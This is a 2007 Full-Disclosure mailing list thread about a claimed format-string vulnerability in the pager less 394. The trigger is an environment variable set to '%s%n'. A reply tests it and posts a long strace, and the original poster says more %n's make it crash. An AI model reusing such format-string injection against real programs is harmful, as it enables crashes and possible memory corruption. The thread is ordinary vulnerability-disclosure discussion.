It's taking arguments out of your environment for the format string; put a couple more %n's and watch it die horribly. That's why I said "a meager demonstration." The emphasis was definitely on meager ;)
On 10/31/07, Jeffrey Denton <[EMAIL PROTECTED]> wrote: > On 10/31/07, glopeda. com <[EMAIL PROTECTED]> wrote: > > From: [EMAIL PROTECTED] > > Application: less 394 and prior > > Type: Format strings vulnerability > > Priority: Low > > > Meager demonstration: > > $ export LESSOPEN=%s%n > > $ less somefile > > Segmentation fault > > $ > > Interesting... > > $ echo $LESSOPEN > |lesspipe.sh %s > $ export LESSOPEN=%s%n > $ less iptraf.txt > /bin/bash: ./iptraf.txt: Permission denied > : No such file or directory > $ less --version > less 394 > Copyright (C) 1984-2005 Mark Nudelman > > less comes with NO WARRANTY, to the extent permitted by law. > For information about the terms of redistribution, > see the file named README in the less distribution. > Homepage: http://www.greenwoodsoftware.com/less > $ id > uid=1000(dentonj) gid=100(users) > groups=11(floppy),17(audio),18(video),19(cdrom),83(plugdev),100(users) > $ ls -l iptraf.txt > -rw-r--r-- 1 dentonj users 300 2007-10-25 08:04 iptraf.txt > $ echo $LESSOPEN > %s%n > $ cat /etc/slackware-version > Slackware 12.0.0 > > $ strace /usr/bin/less iptraf.txt > execve("/usr/bin/less", ["/usr/bin/less", "iptraf.txt"], [/* 47 vars */]) = 0 > brk(0) = 0x8065000 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7efb000 > access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or > directory) > open("/etc/ld.so.cache", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=111039, ...}) = 0 > mmap2(NULL, 111039, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7edf000 > close(3) = 0 > open("/lib/libncursesw.so.5", O_RDONLY) = 3 > read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\352"..., 512) = > 512 > fstat64(3, {st_mode=S_IFREG|0755, st_size=309276, ...}) = 0 > mmap2(NULL, 311172, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, > 0) = 0xb7e93000 > mmap2(0xb7ed7000, 32768, PROT_READ|PROT_WRITE, > MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x43) = 0xb7ed7000 > close(3) = 0 > 
open("/lib/libc.so.6", O_RDONLY) = 3 > read(3, "[EMAIL PROTECTED]"..., 512) = 512 > fstat64(3, {st_mode=S_IFREG|0755, st_size=1528742, ...}) = 0 > mmap2(NULL, 1316260, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, > 3, 0) = 0xb7d51000 > mmap2(0xb7e8d000, 12288, PROT_READ|PROT_WRITE, > MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x13c) = 0xb7e8d000 > mmap2(0xb7e90000, 9636, PROT_READ|PROT_WRITE, > MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e90000 > close(3) = 0 > open("/lib/libdl.so.2", O_RDONLY) = 3 > read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0P\n\0\000"..., > 512) = 512 > fstat64(3, {st_mode=S_IFREG|0755, st_size=13506, ...}) = 0 > mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, > 0) = 0xb7d4d000 > mmap2(0xb7d4f000, 8192, PROT_READ|PROT_WRITE, > MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1) = 0xb7d4f000 > close(3) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7d4c000 > set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d4c8d0, > limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, > limit_in_pages:1, seg_not_present:0, useable:1}) = 0 > mprotect(0xb7e8d000, 4096, PROT_READ) = 0 > munmap(0xb7edf000, 111039) = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > brk(0) = 0x8065000 > brk(0x8086000) = 0x8086000 > stat64("/home/dentonj/.terminfo", 0xbfc67624) = -1 ENOENT (No such > file or directory) > stat64("/usr/share/terminfo", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 > access("/usr/share/terminfo/x/xterm", R_OK) = 0 > open("/usr/share/terminfo/x/xterm", O_RDONLY|O_LARGEFILE) = 3 > read(3, "\32\0010\0&\0\17\0\235\1F\5xterm|xterm terminal"..., 4097) = 2522 > close(3) = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > ioctl(1, 
SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > ioctl(1, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 > ioctl(2, TIOCGWINSZ, {ws_row=25, ws_col=80, ws_xpixel=0, ws_ypixel=0}) = 0 > open("/usr/bin/.sysless", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such > file or directory) > open("/etc/sysless", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file > or directory) > open("/home/dentonj/.less", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such > file or directory) > open("/usr/lib/locale/locale-archive", O_RDONLY|O_LARGEFILE) = -1 > ENOENT (No such file or directory) > open("/usr/share/locale/locale.alias", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=2586, ...}) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7efa000 > read(3, "# Locale name alias data base.\n#"..., 4096) = 2586 > read(3, "", 4096) = 0 > close(3) = 0 > munmap(0xb7efa000, 4096) = 0 > open("/usr/lib/locale/en_US/LC_IDENTIFICATION", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=378, ...}) = 0 > mmap2(NULL, 378, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7efa000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_MEASUREMENT", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=28, ...}) = 0 > mmap2(NULL, 28, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef9000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_TELEPHONE", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=64, ...}) = 0 > mmap2(NULL, 64, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef8000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_ADDRESS", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=160, ...}) = 0 > mmap2(NULL, 160, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef7000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_NAME", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=82, ...}) = 0 > mmap2(NULL, 82, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef6000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_PAPER", O_RDONLY) = 3 > fstat64(3, 
{st_mode=S_IFREG|0644, st_size=39, ...}) = 0 > mmap2(NULL, 39, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef5000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_MESSAGES", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_MESSAGES/SYS_LC_MESSAGES", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=57, ...}) = 0 > mmap2(NULL, 57, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef4000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_MONETARY", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=291, ...}) = 0 > mmap2(NULL, 291, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef3000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_TIME", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=2459, ...}) = 0 > mmap2(NULL, 2459, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef2000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_NUMERIC", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=59, ...}) = 0 > mmap2(NULL, 59, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7ef1000 > close(3) = 0 > open("/usr/lib/locale/en_US/LC_CTYPE", O_RDONLY) = 3 > fstat64(3, {st_mode=S_IFREG|0644, st_size=207720, ...}) = 0 > mmap2(NULL, 207720, PROT_READ, MAP_PRIVATE, 3, 0) = 0xb7d19000 > close(3) = 0 > open("/home/dentonj/.lesshst", O_RDONLY|O_LARGEFILE) = 3 > fstat64(3, {st_mode=S_IFREG|0600, st_size=54, ...}) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7ef0000 > read(3, ".less-history-file:\n.search\n\"rc\n"..., 4096) = 54 > read(3, "", 4096) = 0 > close(3) = 0 > munmap(0xb7ef0000, 4096) = 0 > open("/dev/tty", O_RDONLY|O_LARGEFILE) = 3 > ioctl(3, SNDCTL_TMR_TIMEBASE or TCGETS, {B38400 opost isig icanon echo ...}) > = 0 > fsync(3) = -1 EINVAL (Invalid argument) > ioctl(3, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig -icanon -echo ...}) = > 0 > rt_sigaction(SIGINT, {0x805a220, [INT], SA_RESTART}, {SIG_DFL}, 8) = 0 > rt_sigaction(SIGTSTP, {0x805a260, [TSTP], SA_RESTART}, {SIG_DFL}, 8) = 0 > 
rt_sigaction(SIGWINCH, {0x805a2a0, [WINCH], SA_RESTART}, {SIG_DFL}, 8) = 0 > pipe([4, 5]) = 0 > clone(child_stack=0, > flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, > child_tidptr=0xb7d4c918) = 10823 > close(5) = 0 > fstat64(4, {st_mode=S_IFIFO|0600, st_size=0, ...}) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7ef0000 > read(4, /bin/bash: ./iptraf.txt: Permission denied > "", 1024) = 0 > close(4) = 0 > waitpid(10823, [{WIFEXITED(s) && WEXITSTATUS(s) == 126}], 0) = 10823 > --- SIGCHLD (Child exited) @ 0 (0) --- > munmap(0xb7ef0000, 4096) = 0 > stat64(" > ", 0xbfc68e10) = -1 ENOENT (No such file or directory) > stat64(" > ", 0xbfc68e90) = -1 ENOENT (No such file or directory) > open("/usr/share/locale/en_US/LC_MESSAGES/libc.mo", O_RDONLY) = -1 > ENOENT (No such file or directory) > open("/usr/share/locale/en/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT > (No such file or directory) > open("/home/dentonj/.lesshst", O_WRONLY|O_CREAT|O_TRUNC|O_LARGEFILE, 0666) = 4 > fchmod(4, 0600) = 0 > fstat64(4, {st_mode=S_IFREG|0600, st_size=0, ...}) = 0 > mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, > 0) = 0xb7ef0000 > write(4, ".less-history-file:\n.search\n\"rc\n"..., 54) = 54 > close(4) = 0 > munmap(0xb7ef0000, 4096) = 0 > write(2, "\n: No such file or directory\n", 29 > : No such file or directory > ) = 29 > fsync(3) = -1 EINVAL (Invalid argument) > ioctl(3, SNDCTL_TMR_STOP or TCSETSW, {B38400 opost isig icanon echo ...}) = 0 > exit_group(1) = ? > Process 10822 detached > $ > > $ chmod 755 iptraf.txt > $ less iptraf.txt > ./iptraf.txt: line 1: 10.1.1.1:33073: command not found > ./iptraf.txt: line 2: 10.1.1.2:54356: command not found > . . . > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Site: http://www.glopeda.com E-mail: [EMAIL PROTECTED] Name: Mitch _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/